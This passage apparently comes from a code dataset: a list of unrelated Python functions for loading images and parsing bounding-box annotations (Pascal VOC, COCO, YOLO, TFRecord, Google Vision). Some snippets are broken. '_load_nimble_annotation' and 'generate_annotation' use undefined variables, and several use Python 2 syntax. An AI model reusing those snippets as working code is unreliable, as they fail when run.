Decode the RGB JPEG.\n image = coder.decode_jpeg(image_data)\n\n # Check that image converted to RGB\n assert len(image.shape) == 3\n height = image.shape[0]\n width = image.shape[1]\n assert image.shape[2] == 3\n\n return image_data, height, width", "def __read_img_file(filename, label):\n image = cv2.cvtColor(cv2.imread(filename), cv2.COLOR_BGR2RGB)\n height, width, _ = image.shape\n image = cv2.resize(image, (img_size, img_size))\n # A label is consist of [y1, x1, y2, x2, class_idx]\n label = np.reshape(label, (-1, 5))\n rel_bboxes = label[..., 0:4] / np.array([height, width, height, width], np.float32)\n label = np.concatenate([rel_bboxes, np.expand_dims(label[..., -1], 1)], axis=-1)\n return image, label", "def __parse_image_load(self, image_path: str, image_label: int):\n one_hot = tf.one_hot(image_label, self.num_classes, dtype=dtypes.int32)\n if self.rgb:\n flag = cv2.IMREAD_COLOR\n else:\n flag = cv2.IMREAD_GRAYSCALE\n\n img = cv2.imread(image_path, flags=flag)\n img = cv2.resize(img, (self.image_shape[1], self.image_shape[0]), interpolation=cv2.INTER_AREA).astype(\n np.float32)\n\n if self.normalize_images:\n img_mean = np.mean(img, axis=(0, 1))\n img_std = np.std(img, axis=(0, 1))\n\n img = (img - img_mean) / img_std\n\n return img, one_hot", "def _load_action_annotation(self, anno_filepath):\n # Check\n assert os.path.exists(anno_filepath), \\\n 'Path does not exist: {}'.format(anno_filepath)\n # Open and read\n lines = None\n with open(anno_filepath) as f:\n # format: imgidx x1 y1 x2 y2 label_list\n # whre label list look like this: 0 0 0 0 1 0 0 (assume here has six action classes)\n lines = f.readlines()\n \n if not lines:\n print\n print \"missing anno_filepath:\", anno_filepath\n sys.exit(1)\n\n # init\n image_index, gt_roidb = [], []\n\n # Process\n for line in lines:\n # Initialize\n boxes = np.zeros((1, 4), dtype=np.uint16)\n gt_classes = np.zeros(1, dtype=np.int32)\n overlaps = np.zeros((1, self.num_classes), dtype=np.float32)\n\n line = line.strip().split()\n args = 0\n imgidx = line[args]\n image_index.append(imgidx)\n\n args += 1\n x1, y1, x2, y2 = line[args: args + 4]\n x1 = float(x1) - 1\n y1 = float(y1) - 1\n x2 = float(x2) - 1\n y2 = float(y2) - 1\n\n args += 4\n classname = line[args]\n cls = self._class_to_ind[classname.lower().strip()]\n\n gt_classes[0] = cls\n boxes[0, :] = [x1, y1, x2, y2]\n overlaps[0, cls] = 1.0\n overlaps = scipy.sparse.csr_matrix(overlaps)\n\n # \n img_anno_dict = {\n 'boxes' : boxes, \n 'gt_classes': gt_classes, \n 'gt_overlaps' : overlaps, \n 'flipped' : False}\n gt_roidb.append(img_anno_dict)\n\n return image_index, gt_roidb", "def proc_image(self, tokens):\n\n print \"IMAGE:\", tokens, tokens.asList(), tokens.keys()\n\n raise NotImplementedError", "def _prepare_image_and_label(self, data):\n image = tf.io.decode_image(data['image/encoded'], channels=3)\n label = tf.io.decode_image(data['image/segmentation/class/encoded'],\n channels=1)\n height = data['image/height']\n width = data['image/width']\n image = tf.reshape(image, (height, width, 3))\n label = tf.reshape(label, (1, height, width))\n label = tf.cast(label, tf.float32)\n # Normalizes image with mean and std pixel values.\n image = input_utils.normalize_image(image)\n return image, label", "def _get_annotation(self, image_id):\n annotation_file = self.image_sets_dir / f'{image_id}.xml'\n objects = ET.parse(annotation_file).findall('object')\n boxes = []\n labels = []\n is_difficult = []\n for obj in objects:\n class_name = obj.find('name').text.lower().strip()\n if class_name in self.class_dict:\n bbox = obj.find('bndbox')\n\n x0 = float(bbox.find('xmin').text) - 1\n y0 = float(bbox.find('ymin').text) - 1\n x1 = float(bbox.find('xmax').text) - 1\n y1 = float(bbox.find('ymax').text) - 1\n boxes.append([x0, y0, x1, y1])\n\n labels.append(self.class_dict[class_name])\n\n is_difficult_str = obj.find('difficult').text\n is_difficult.append(int(is_difficult_str) if is_difficult_str else 0)\n\n return (np.array(boxes, dtype=np.float32),\n np.array(labels, dtype=np.int64),\n np.array(is_difficult, dtype=np.uint8))", "def load_metadata(self, path):\n self.paths = []\n self.annotations = []\n\n with open(path, \"r\") as f:\n for line in f:\n line = line.strip().split(\" \")\n \n rgb_path = line[0]\n\n if len(line) > 1:\n bounding_boxes = np.array([list(map(int, box.split(','))) for box in line[1:]])\n else:\n bounding_boxes = []\n \n self.annotations.append({\n \"rgb_path\": rgb_path, \n \"bounding_boxes\": bounding_boxes,\n })", "def coco_format(type_, id_list, annotation_url_list, file_list, result_list, label_list, coco_flag=0):\n annotations = []\n for i, result in enumerate(result_list):\n temp = {}\n annotation_url = annotation_url_list[i]\n file_path = file_list[i]\n temp['id'] = id_list[i]\n temp['annotation'] = []\n im = cv2.imread(file_path)\n height, width, _ = im.shape\n if result.shape[0] == 0:\n temp['annotation'] = json.dumps(temp['annotation'])\n annotations.append(temp)\n with open(annotation_url, 'w') as w:\n w.write(temp['annotation'])\n continue\n else:\n for j in range(result.shape[0]):\n cls_id = int(result[j][0]) + 1 + coco_flag\n x1 = result[j][1]\n x2 = result[j][3]\n y1 = result[j][2]\n y2 = result[j][4]\n score = result[j][5]\n width = max(0, x2 - x1)\n height = max(0, y2 - y1)\n if cls_id in label_list:\n temp['annotation'].append({\n 'area': width * height,\n 'bbox': [x1, y1, width, height],\n 'category_id': cls_id,\n 'iscrowd': 0,\n 'segmentation': [[x1, y1, x2, y1, x2, y2, x1, y2]],\n 'score': score\n })\n if type_ == 2 and len(temp['annotation']) > 0:\n temp['annotation'] = [temp['annotation'][0]]\n temp['annotation'][0].pop('area')\n temp['annotation'][0].pop('bbox')\n temp['annotation'][0].pop('iscrowd')\n temp['annotation'][0].pop('segmentation')\n temp['annotation'] = json.dumps(temp['annotation'])\n annotations.append(temp)\n with open(annotation_url, 'w') as wr:\n wr.write(temp['annotation'])\n return annotations", "def inspect_annotation_with_image(image_path, annotation_path):\n with Image.open(image_path) as image:\n tree = ET.parse(annotation_path)\n root = tree.getroot()\n for member in root.findall('object'):\n # bbox contains 4 coordinate of format [xmin, ymin, xmax, ymax]\n bbox = member.find(\"bndbox\")\n\n # if object is None, ignore\n if member.find(\"name\") is None:\n continue\n\n xmin = int(bbox.find('xmin').text)\n ymin = int(bbox.find('ymin').text)\n xmax = int(bbox.find('xmax').text)\n ymax = int(bbox.find('ymax').text)\n\n draw = ImageDraw.Draw(image)\n draw.rectangle([xmin, ymin, xmax, ymax], width=2)\n draw.text([xmin, ymin], \"%s\"%member.find(\"name\").text)\n image.show()", "def get(self,index,record, indices):\n video_id = str(record.path).strip().split('/frames/')[1]\n \n ann_file = self._annot_path + '/' + str(record.path).strip().split('/frames/')[1] + '/' + 'puppet_mask.mat' \n \n gt = np.zeros((self.num_segments,self.cfg.MAX_NUM_GT_BOXES,(self.num_classes + 4)),\n dtype=np.float32)\n num_boxes = np.ones((self.num_segments),dtype=np.float32)\n im_info = np.zeros((self.num_segments,3),dtype=np.float32)\n one_hot_labels = np.zeros((self.num_classes),dtype = np.float)\n count = 0\n images =[]\n\n \n class_label =int(record.labels)\n one_hot_labels[class_label] = 1\n \n \n for seg_ind in indices:\n\n #image information \n image_path = os.path.join(record.path, '{:05d}.png'.format(seg_ind))\n im = imread(image_path)\n im = im[:,:,::-1].astype(np.float32, copy=False) #RGB\n height,width,_= im.shape \n im_scale = float(self.cfg.TRAIN.TRIM_HEIGHT) / float(self.cfg.TRAIN.TRIM_WIDTH)\n im = cv2.resize(im, (400,300), fx=im_scale, fy=im_scale,\n interpolation=cv2.INTER_LINEAR)\n im_scale1 = float(self.cfg.TRAIN.TRIM_HEIGHT) / height\n im_scale2 = float(self.cfg.TRAIN.TRIM_WIDTH) / width\n im_info[count,:]=self.cfg.TRAIN.TRIM_HEIGHT,len(im[2]),im_scale\n \n gt[count,0,:4] = self.get_annot_image_boxes(ann_file, seg_ind)\n x1,y1,x2,y2 = gt[count,0,:4]\n y1,y2 = y1*im_scale1,y2*im_scale1\n x1,x2 = x1*im_scale2,x2*im_scale2\n gt[count,0,:4] = x1,y1,x2,y2\n gt[count,0,4:] = one_hot_labels\n count += 1\n images.append(im)\n \n \n max_shape = np.array([imz.shape for imz in images]).max(axis=0)\n blob = np.zeros((len(images), max_shape[0], max_shape[1], 3),\n dtype=np.float32)\n for i in range(len(images)):\n blob[i,0:images[i].shape[0], 0:images[i].shape[1], :] = images[i]\n\n process_data = self.transform(blob)\n return process_data,gt,num_boxes,im_info", "def separate_annotations():\n data_root = '/home/ubuntu/datasets/YT-VIS/'\n ann_file = data_root + 'annotations/instances_train_sub.json'\n import json\n with open(ann_file, 'r') as f:\n ann = json.load(f)\n # ann['videos'] = ann['videos'][15]\n # video_id = [0]\n from tqdm import tqdm\n for id in tqdm(range(len(ann['videos']))):\n videos = []\n anns = []\n video = ann['videos'][id]\n video['id'] = 1\n videos.append(video)\n\n i = 1\n for a in ann['annotations']:\n if a['video_id'] == id + 1:\n anno = a\n anno['id'] = i\n anno['video_id'] = 1\n anns.append(anno)\n i += 1\n # anno = ann['annotations'][id]\n # anno['id'] = 1\n # anno['video_id'] = 1\n # anns.append(anno)\n\n file_name = videos[0]['file_names'][0].split('/')[0]\n\n ann_new = dict()\n ann_new['info'] = ann['info']\n ann_new['licenses'] = ann['licenses']\n ann_new['categories'] = ann['categories']\n ann_new['videos'] = videos\n ann_new['annotations'] = anns\n\n with open(data_root + 'train/Annotations/{}/{}_annotations.json'.format(file_name, file_name), 'w') as f:\n json.dump(ann_new, f, ensure_ascii=False)", "def parser(self, serialized_example):\n features = {\n 'image/height': tf.FixedLenFeature([], tf.int64),\n 'image/width': tf.FixedLenFeature([], tf.int64),\n 'image/colorspace': tf.FixedLenFeature([], tf.string),\n 'image/channels': tf.FixedLenFeature([], tf.int64),\n 'image/class/label': tf.FixedLenFeature([], tf.int64),\n 'image/class/synset': tf.FixedLenFeature([], tf.string),\n 'image/class/text': tf.FixedLenFeature([], tf.string),\n 'image/object/bbox/xmin': tf.VarLenFeature(tf.float32),\n 'image/object/bbox/ymin': tf.VarLenFeature(tf.float32),\n 'image/object/bbox/xmax': tf.VarLenFeature(tf.float32),\n 'image/object/bbox/ymax': tf.VarLenFeature(tf.float32),\n 'image/object/bbox/label': tf.VarLenFeature(tf.int64),\n 'image/format': tf.FixedLenFeature([], tf.string),\n 'image/encoded': tf.FixedLenFeature([], tf.string)}\n parsed_features = tf.parse_single_example(serialized_example, features)\n\n # Get label as a Tensor.\n label = parsed_features['image/class/label']\n\n # Decode the image JPEG string into a Tensor.\n image = tf.image.decode_jpeg(parsed_features['image/encoded'],\n channels=self.DEPTH)\n\n # VGG preprocessing borrowed from slim; includes data augmentation so train_with_distortion should be set to True.\n if self.mode == tf.estimator.ModeKeys.TRAIN:\n assert self.params['train_with_distortion'] == True\n is_training = True\n else:\n is_training = False\n image = vgg_preprocess_image(image, 224, 224, is_training=is_training)\n\n return image, label", "def _load_pascal_annotation(self, index):\n image = index\n im_path = self.image_path_from_index(image)\n im = cv2.imread(im_path)\n width = im.shape[1]\n height = im.shape[0]\n num_objs = 0\n for ix, obj in enumerate(image.objects):\n if image.objects[ix].x > width - 2 or image.objects[ix].y > height - 2:\n continue \n assert(image.objects[ix].width > 0)\n assert(image.objects[ix].height > 0)\n\n num_objs += 1\n\n boxes = np.zeros((num_objs, 4), dtype=np.float32)\n\n partial_entity_class = np.zeros((num_objs, 96), dtype=np.int32)\n partial_relation_class = np.zeros((num_objs, num_objs, 43), dtype=np.int32)\n gt_classes = np.zeros((0, num_objs, 1), dtype=np.int32)\n overlaps = np.zeros((0, num_objs, self.num_classes), dtype=np.int64)\n # \"Seg\" area for pascal is just the box area\n seg_areas = np.zeros((num_objs), dtype=np.float32)\n queries = np.zeros((0, 235), dtype=np.float32)\n # Load object bounding boxes into a data frame.\n index = 0\n \n for ix, obj in enumerate(image.objects):\n if image.objects[ix].x > width - 2 or image.objects[ix].y > height - 2:\n continue\n # Make pixel indexes 0-based\n x1_offset = 0.0#image.objects[ix].width * (-0.1)\n x2_offset = 0.0#image.objects[ix].width * 0.1\n y1_offset = 0.0#image.objects[ix].height * (-0.1)\n y2_offset = 0.0#image.objects[ix].height * 0.1\n boxes[index][0] = max((image.objects[ix].x + x1_offset), 0.0)\n boxes[index][1] = max((image.objects[ix].y + y1_offset), 0.0)\n boxes[index][2] = min((image.objects[ix].x + x2_offset + image.objects[ix].width), width - 1)\n boxes[index][3] = min((image.objects[ix].y + y2_offset + image.objects[ix].height), height - 1)\n seg_areas[index] = (boxes[index][2] - boxes[index][0] + 1.0) * (boxes[index][3] - boxes[index][1] + 1.0)\n index += 1\n assert (boxes[:, 2] > boxes[:, 0]).all()\n assert (boxes[:, 3]\t > boxes[:, 1]).all() \n #load gt classes\n \n i_index = 0\n for i in range(image.objects_labels.shape[0]):\n if image.objects[i].x > width - 2 or image.objects[i].y > height - 2:\n continue\n partial_entity_class[i_index] = image.objects_labels[i]\n \n j_index = 0\n for j in range(image.objects_labels.shape[0]):\n if image.objects[j].x > width - 2 or image.objects[j].y > height - 2:\n continue\n partial_relation_class[i_index, j_index] = image.predicates_labels[i, j]\n j_index += 1\n i_index += 1\n seen = []\n for query_index in range(image.queries_gt.shape[0]):\n query_gt_classes = np.zeros((1, num_objs, 1), dtype=np.int32)\n query_overlaps = np.zeros((1, num_objs, self.num_classes), dtype=np.int64)\n query_overlaps[0, :, 3] = 1\n query_gt_classes[0, :, 0] = 3\n if image.one_hot_relations_gt[query_index][-1] == 1:\n # print \"negative triplet\"\n continue\n\n sub = image.one_hot_relations_gt[query_index][:96]\n obj = image.one_hot_relations_gt[query_index][96:96 * 2]\n rel = image.one_hot_relations_gt[query_index][96 * 2:]\n key = str(np.argmax(sub)) + \"_\" + str(np.argmax(rel)) + \"_\" + str(np.argmax(obj))\n if key in seen:\n continue\n seen.append(key)\n\n found = False\n i_index = 0\n for i in range(image.objects_labels.shape[0]):\n if image.objects[i].x > width - 2 or image.objects[i].y > height - 2:\n continue\n if not np.array_equal(image.objects_labels[i], sub):\n i_index += 1\n continue\n j_index = 0\n for j in range(image.objects_labels.shape[0]):\n if image.objects[j].x > width - 2 or image.objects[j].y > height - 2:\n continue \n\n if not np.array_equal(image.objects_labels[j], obj):\n j_index += 1\n continue\n if np.array_equal(rel, image.predicates_labels[i, j]):\n query_gt_classes[0, i_index, 0] = 1\n query_overlaps[0, i_index, 1] = 1\n query_overlaps[0, i_index, 3] = 0\n query_gt_classes[0, j_index, 0] = 2\n query_overlaps[0, j_index, 2] = 1\n query_overlaps[0, j_index, 3] = 0\n \n #partial_entity_class[i_index] = sub\n #partial_entity_class[j_index] = obj\n #partial_relation_class[i_index, j_index] = rel\n \n found = True\n j_index += 1\n i_index += 1\n if not found:\n continue\n gt_classes = np.concatenate((gt_classes, query_gt_classes), axis=0)\n overlaps = np.concatenate((overlaps, query_overlaps), axis=0)\n queries = np.concatenate((queries, image.one_hot_relations_gt[query_index].reshape([1,-1])), axis=0)\n\n return {'boxes': boxes,\n 'gt_classes': gt_classes,\n 'gt_overlaps': overlaps,\n 'flipped': False,\n 'seg_areas': seg_areas,\n 'query' : queries,\n 'partial_entity_class' : partial_entity_class,\n 'partial_relation_class' : partial_relation_class,\n 'orig_image': None}", "def generate_annotation(target, images, bbox_path):\n good_image_paths = []\n bad_image_paths = []\n bb = read_annotation_yolov5(bbox_path)\n for path in images:\n basename = os.path.basename(path) # extract file name only (e.g., bear_013.jpg)\n basename_no_ext = os.path.splitext(basename)[0] # extract file name (e.g., bear_013)\n\n label_filepath = os.path.join(target, f'{basename_no_ext}.txt')\n item = bb[int(basename_no_ext.split('_')[-1])] # e.g., 0.556, 0.6145, 0.3718, 0.5958\n # validation that annotation is between 0 and 1.\n if item[0] <= 0 or item[1] <= 0 or item[2] <= 0 or item[3] <= 0 \\\n or item[0] >= 1 or item[1] >= 1 or item[2] >= 1 or item[3] >= 1:\n print(f\"{basename_no_ext} has out of range value: {item[0]} {item[1]} {item[2]} {item[3]}\")\n bad_image_paths.append(path)\n continue\n\n with open(label_filepath, 'w') as out_file: # a label file is same as corresponding image file name\n cls_id = classes.index(cls)\n out_file.write(f\"{cls_id} {item[0]} {item[1]} {item[2]} {item[3]}\")\n good_image_paths.append(path)\n # print(f\"{basename_no_ext:} {cls_id} {item[0]} {item[1]} {item[2]} {item[3]}\")\n\n return good_image_paths, bad_image_paths", "def annotate(path):\n if not path:\n return\n\n client = vision.ImageAnnotatorClient()\n\n if path.startswith('http') or path.startswith('gs:'):\n image = types.Image()\n image.source.image_uri = path\n\n else:\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n image = types.Image(content=content)\n\n web_detection = client.web_detection(image=image).web_detection\n\n return web_detection", "def parser_image_data(jpeg_file_path):\n image = tf.io.read_file(jpeg_file_path)\n image = tf.image.decode_jpeg(image)\n image = tf.image.resize(image, [image_height, image_width])\n image = tf.cast(image, dtype=tf.float32)\n image = (image / 127.5) - 1.0\n return image", "def write_annotation(self, ann_file, img_path, new_img_name):\n if self.type == \"imagenet\":\n label = self.in_annotations[img_path]\n logger.debug(f\"Img {img_path}, imagenet label {label}\")\n ann_file.write(str(label) + \"\\n\")\n elif self.type == \"coco\":\n ann_file.write(\"detection_results {\\n\")\n for obj in self.in_annotations[img_path].keys():\n ann_file.write(\" objects {\\n\")\n ann_file.write(f\" class_id: {self.in_annotations[img_path][obj]['label']}\\n\")\n ann_file.write(\" bounding_box {\\n\")\n ann_file.write(f\" normalized_top: {self.in_annotations[img_path][obj]['normalized_bbox'][0]}\\n\")\n ann_file.write(f\" normalized_bottom: {self.in_annotations[img_path][obj]['normalized_bbox'][1]}\\n\")\n ann_file.write(f\" normalized_left: {self.in_annotations[img_path][obj]['normalized_bbox'][2]}\\n\")\n ann_file.write(f\" normalized_right: {self.in_annotations[img_path][obj]['normalized_bbox'][3]}\\n\")\n ann_file.write(\" }\\n\")\n ann_file.write(\" }\\n\")\n ann_file.write(f' image_name: \"{new_img_name}\"\\n')\n ann_file.write(f' image_id: {int(new_img_name.split(\".\")[0])}\\n')\n ann_file.write(\"}\\n\")", "def parse(self, infile):\r\n raise NotImplementedError()", "def load_annotations(self):\n # get keys\n with open(self.ann_file, 'r') as fin:\n keys = [line.strip().split(' ')[0] for line in fin]\n # get frame index list for LQ frames\n frame_index_list = []\n for i in range(self.num_input_frames):\n # Each clip of Vimeo90K has 7 frames starting from 1. So we use 9\n # for generating frame_index_list:\n # N | frame_index_list\n # 1 | 4\n # 3 | 3,4,5\n # 5 | 2,3,4,5,6\n # 7 | 1,2,3,4,5,6,7\n frame_index_list.append(i + (9 - self.num_input_frames) // 2)\n\n data_infos = []\n for key in keys:\n folder, subfolder = key.split('/')\n lq_paths = []\n for i in frame_index_list:\n lq_paths.append(\n osp.join(self.lq_folder, folder, subfolder, f'im{i}.png'))\n gt_paths = [osp.join(self.gt_folder, folder, subfolder, 'im4.png')]\n\n data_infos.append(\n dict(lq_path=lq_paths, gt_path=gt_paths, key=key))\n\n return data_infos", "def _read_annotations(csv_reader, classes):\n result = {}\n for line, row in enumerate(csv_reader):\n line += 1\n\n try:\n img_file, x1, y1, x2, y2, class_name = row[:6]\n except ValueError:\n raise_from(ValueError(\n 'line {}: format should be \\'img_file,x1,y1,x2,y2,class_name\\' or \\'img_file,,,,,\\''.format(line)),\n None)\n\n if img_file not in result:\n result[img_file] = []\n\n # If a row contains only an image path, it's an image without annotations.\n if (x1, y1, x2, y2, class_name) == ('', '', '', '', ''):\n continue\n\n x1 = _parse(x1, int, 'line {}: malformed x1: {{}}'.format(line))\n y1 = _parse(y1, int, 'line {}: malformed y1: {{}}'.format(line))\n x2 = _parse(x2, int, 'line {}: malformed x2: {{}}'.format(line))\n y2 = _parse(y2, int, 'line {}: malformed y2: {{}}'.format(line))\n\n # Check that the bounding box is valid.\n if x2 <= x1:\n raise ValueError('line {}: x2 ({}) must be higher than x1 ({})'.format(line, x2, x1))\n if y2 <= y1:\n raise ValueError('line {}: y2 ({}) must be higher than y1 ({})'.format(line, y2, y1))\n\n # check if the current class name is correctly present\n if class_name not in classes:\n raise ValueError('line {}: unknown class name: \\'{}\\' (classes: {})'.format(line, class_name, classes))\n\n result[img_file].append({'x1': x1, 'x2': x2, 'y1': y1, 'y2': y2, 'class': class_name})\n return result", "def parse_image_meta(meta):\n image_id = meta[:, 0]\n image_shape = meta[:, 1:4]\n window = meta[:, 4:8] # (x1, y1, x2, y2) window of image in in pixels\n active_class_ids = meta[:, 8:]\n return image_id, image_shape, window, active_class_ids", "def handleImageRunner(self) :\n tag = self.readByte()\n if tag == ord(self.imagerunnermarker1[-1]) :\n oldpos = self.pos-2\n codop = self.minfile[self.pos:self.pos+2]\n length = unpack(\">H\", self.minfile[self.pos+6:self.pos+8])[0]\n self.pos += 18\n if codop != self.imagerunnermarker2 :\n self.pos += length\n self.logdebug(\"IMAGERUNNERTAG SKIP %i AT %08x\" % (self.pos-oldpos, self.pos))\n else :\n self.pos -= 1 # Adjust position", "def _load_nimble_annotation(self, index):\n filename = os.path.join(self._data_path, 'Annotations_Python', index + '.json')\n #currently only one bbox is considered.\n assert os.path.exists(cache_file),'Annotation {} has to be here'.format(filename)\n \n num_objs = 1\n boxes = np.zeros((num_objs, 4), dtype=np.uint16)\n gt_classes = np.zeros((num_objs), dtype=np.int32)\n overlaps = np.zeros((num_objs, self.num_classes), dtype=np.float32)\n # \"Seg\" area for pascal is just the box area\n seg_areas = np.zeros((num_objs), dtype=np.float32)\n\n f = open(filename,'r')\n\n # Load object bounding boxes into a data frame.\n for ix, obj in enumerate(objs):\n cls = 1 \n gtboxes_1[ix, :] = obj.bbox\n gtboxes_2[ix,:] = obj.gtbbox\n gt_classes_1[ix] = cls\n overlaps_1[ix, cls] = 1.0\n seg_areas_1[ix] = 0\n gt_classes_1[ix] = cls\n overlaps_1[ix, cls] = 1.0\n seg_areas_1[ix] = 0\n\n overlaps = scipy.sparse.csr_matrix(overlaps)\n\n return {'donor_file' : donor_file,\n 'boxes_1' : gtboxes_1,\n 'boxes_2' : gtboxes_2,\n 'gt_classes_1': gt_classes_1,\n 'gt_overlaps_1' : overlaps_1,\n 'gt_classes_2': gt_classes_2,\n 'gt_overlaps_2' : overlaps_2,\n 'flipped' : False,\n 'seg_areas_1' : seg_areas_1,\n 'seg_areas_2' : seg_areas_2}", "def extract(self, source):\n\t\tp = Parser()\n\t\tf = open_pds(source)\n\t\tif self.log: self.log.debug(\"Parsing '%s'\" % (source))\n\t\tself.labels = p.parse(f)\n\t\tif self.log: self.log.debug(\"Found %d labels\" % (len(self.labels)))\n\t\tif self._check_image_is_supported():\n\t\t\tif self.log: self.log.debug(\"Image in '%s' is supported\" % (source))\n\t\t\tdim = self._get_image_dimensions()\n\t\t\tloc = self._get_image_location()\n\t\t\timageSampleBits = int(self.labels['IMAGE']['SAMPLE_BITS'])\n\t\t\timageSampleType = self.labels['IMAGE']['SAMPLE_TYPE']\n\t\t\tmd5Checksum = self._get_image_checksum()\n\t\t\tif self.log: self.log.debug(\"Image dimensions should be %s\" % (str(dim)))\n\t\t\tif self.log: self.log.debug(\"Seeking to image data at %d\" % (loc))\n\t\t\tf.seek(loc)\n\t\t\tif imageSampleBits == 8:\n\t\t\t\treadSize = dim[0] * dim[1]\n\t\t\telif imageSampleBits == 16:\n\t\t\t\treadSize = dim[0] * dim[1] * 2\n\t\t\tprint readSize\n\t\t\tif self.log: self.log.debug(\"Seek successful, reading data (%s)\" % (readSize))\n\t\t\t# rawImageData = f.readline()\n\t\t\t# f.seek(-int(self.labels[\"RECORD_BYTES\"]), os.SEEK_CUR)\n\t\t\trawImageData = f.read(readSize)\n\t\t\tif md5Checksum:\n\t\t\t\trawImageChecksum = hashlib.md5(rawImageData).hexdigest()\n\t\t\t\tchecksumVerificationPassed = rawImageChecksum == md5Checksum and True or False\n\t\t\t\tif not checksumVerificationPassed:\n\t\t\t\t\tif self.log: self.log.debug(\"Secure hash verification failed\")\n\t\t\t\t\tif self.raisesChecksumError:\n\t\t\t\t\t\terrorMessage = \"Verification failed! Expected '%s' but got '%s'.\" % (md5Checksum, rawImageChecksum)\n\t\t\t\t\t\traise ChecksumError, errorMessage\n\t\t\t\telse:\n\t\t\t\t\tif self.log: self.log.debug(\"Secure hash verification passed\")\n\t\t\tif self.log: self.log.debug(\"Read successful (len: %d), creating Image object\" % (len(rawImageData)))\n\t\t\t# The frombuffer defaults may change in a future release;\n\t\t\t# for portability, change the call to read:\n\t\t\t# frombuffer(mode, size, data, 'raw', mode, 0, 1).\n\t\t\tif (imageSampleBits == 16) and imageSampleType == ('MSB_INTEGER'):\n\t\t\t\t#img = Image.frombuffer('I', dim, rawImageData, 'raw', 'I;16BS', 0, 1)\n\t\t\t\timg = Image.frombuffer('F', dim, rawImageData, 'raw', 'F;16B', 0, 1)\n\t\t\t\timg = ImageMath.eval(\"convert(a/16.0, 'L')\", a=img)\n\t\t\telse:\n\t\t\t\timg = Image.frombuffer('L', dim, rawImageData, 'raw', 'L', 0, 1)\n\t\t\tif self.log:\n\t\t\t\tself.log.debug(\"Image result: %s\" % (str(img)))\n\t\t\t\tself.log.debug(\"Image info: %s\" % (str(img.info)))\n\t\t\t\tself.log.debug(\"Image mode: %s\" % (str(img.mode)))\n\t\t\t\tself.log.debug(\"Image size: %s\" % (str(img.size)))\n\t\telse:\n\t\t\tif self.log: self.log.error(\"Image is not supported '%s'\" % (source))\n\t\t\timg = None\n\t\tf.close()\n\n\t\treturn img, self.labels", "def parse(self):\n imset = []\n imdir = remkdir(os.path.join(self._datadir, 'images'))\n csv_actors = readcsv(os.path.join(self._datadir, 'facescrub_actors.txt'), separator='\\t')\n for (subjectname, imageid, faceid, url, bbox, sha256) in csv_actors[1:]:\n categoryname = subjectname.replace(' ', '_')\n (xmin,ymin,xmax,ymax) = bbox.split(',')\n imset.append(ImageDetection(url=url, filename=os.path.join(imdir, '%s_%s.jpg' % (categoryname, imageid)), category=categoryname, xmin=xmin, ymin=ymin, xmax=xmax, ymax=ymax, attributes={'GENDER':'male'}))\n\n csv_actresses = readcsv(os.path.join(self._datadir, 'facescrub_actresses.txt'), separator='\\t')\n for (subjectname, imageid, faceid, url, bbox, sha256) in csv_actresses[1:]:\n categoryname = subjectname.replace(' ', '_')\n (xmin,ymin,xmax,ymax) = bbox.split(',')\n imset.append(ImageDetection(url=url, filename=os.path.join(imdir, '%s_%s.jpg' % (categoryname, imageid)), category=categoryname, xmin=xmin, ymin=ymin, xmax=xmax, ymax=ymax, attributes={'GENDER':'female'}))\n\n return imset", "def parse_metadata_file(self, file):\n\n file_keys = list(file.keys())\n\n if 'labelAnnotations' in file_keys:\n file_annots = file['labelAnnotations']\n file_top_score = np.asarray(\n [x['score'] for x in file_annots]).mean()\n file_top_desc = [x['description'] for x in file_annots]\n else:\n file_top_score = np.nan\n file_top_desc = ['']\n\n file_colors = file['imagePropertiesAnnotation']['dominantColors'][\n 'colors']\n file_crops = file['cropHintsAnnotation']['cropHints']\n\n file_color_score = np.asarray([x['score'] for x in file_colors]).mean()\n file_color_pixelfrac = np.asarray(\n [x['pixelFraction'] for x in file_colors]).mean()\n\n file_crop_conf = np.asarray(\n [x['confidence'] for x in file_crops]).mean()\n\n if 'importanceFraction' in file_crops[0].keys():\n file_crop_importance = np.asarray(\n [x['importanceFraction'] for x in file_crops]).mean()\n else:\n file_crop_importance = np.nan\n\n df_metadata = {\n 'annots_score': file_top_score,\n 'color_score': file_color_score,\n 'color_pixelfrac': file_color_pixelfrac,\n 'crop_conf': file_crop_conf,\n 'crop_importance': file_crop_importance,\n 'annots_top_desc': self.sentence_sep.join(file_top_desc)\n }\n\n df_metadata = pd.DataFrame.from_dict(df_metadata, orient='index').T\n df_metadata = df_metadata.add_prefix('metadata_')\n\n return df_metadata", "def _load_pascal_annotations(self, index):\n image_name = self._image_index[index]\n filename = os.path.join(self._data_path, 'Annotations', image_name + '.xml')\n tree = xmlET.parse(filename)\n objs = tree.findall('object')\n if not self.config['use_diff']:\n # Exclude the samples labeled as difficult\n non_diff_objs = [\n obj for obj in objs if int(obj.find('difficult').text) == 0]\n if len(non_diff_objs) != len(objs):\n print 'Removed {} difficult objects'.format(len(objs) - len(non_diff_objs))\n objs = non_diff_objs\n num_objs = len(objs)\n\n boxes = np.zeros((num_objs, 4), dtype=np.uint16)\n gt_classes = np.zeros(num_objs, dtype=np.int32)\n overlaps = np.zeros((num_objs, self.num_classes), dtype=np.float32)\n\n # Load object bounding boxes into a data frame.\n # boxes[ind, :] will be boxes\n # gt_classes[ind] will be the associated class name for this box\n # overlaps[ind, class] will assign 1.0 to ground truth\n for ix, obj in enumerate(objs):\n bbox = obj.find('bndbox')\n # Make pixel indexes 0-based\n x1 = float(bbox.find('xmin').text) - 1\n y1 = float(bbox.find('ymin').text) - 1\n x2 = float(bbox.find('xmax').text) - 1\n y2 = float(bbox.find('ymax').text) - 1\n cls = self._class_to_ind[obj.find('name').text.lower().strip()]\n boxes[ix, :] = [x1, y1, x2, y2]\n gt_classes[ix] = cls\n overlaps[ix, cls] = 1.0\n\n overlaps = scipy.sparse.csr_matrix(overlaps)\n return {'boxes': boxes,\n 'gt_classes': gt_classes,\n 'gt_overlaps': overlaps,\n 'flipped': False}", "def main_picamera():\n #takephoto() # First take a picture\n\n credentials = GoogleCredentials.get_application_default()\n service = discovery.build('vision', 'v1', credentials=credentials)\n\n with open('image.jpg', 'rb') as image:\n # image_content = base64.b64encode(image.read())\n image_content = image.read()\n service_request = service.images().annotate(body={\n 'requests': [{\n 'image': {\n 'content': image_content.decode('UTF-8')\n },\n 'features': [{\n 'type': 'LOGO_DETECTION',\n 'maxResults': 1\n }]\n }]\n })\n response = service_request.execute()\n\n try:\n label = response['responses'][0]['logoAnnotations'][0]['description']\n except:\n label = \"No response.\"\n\n print(label)", 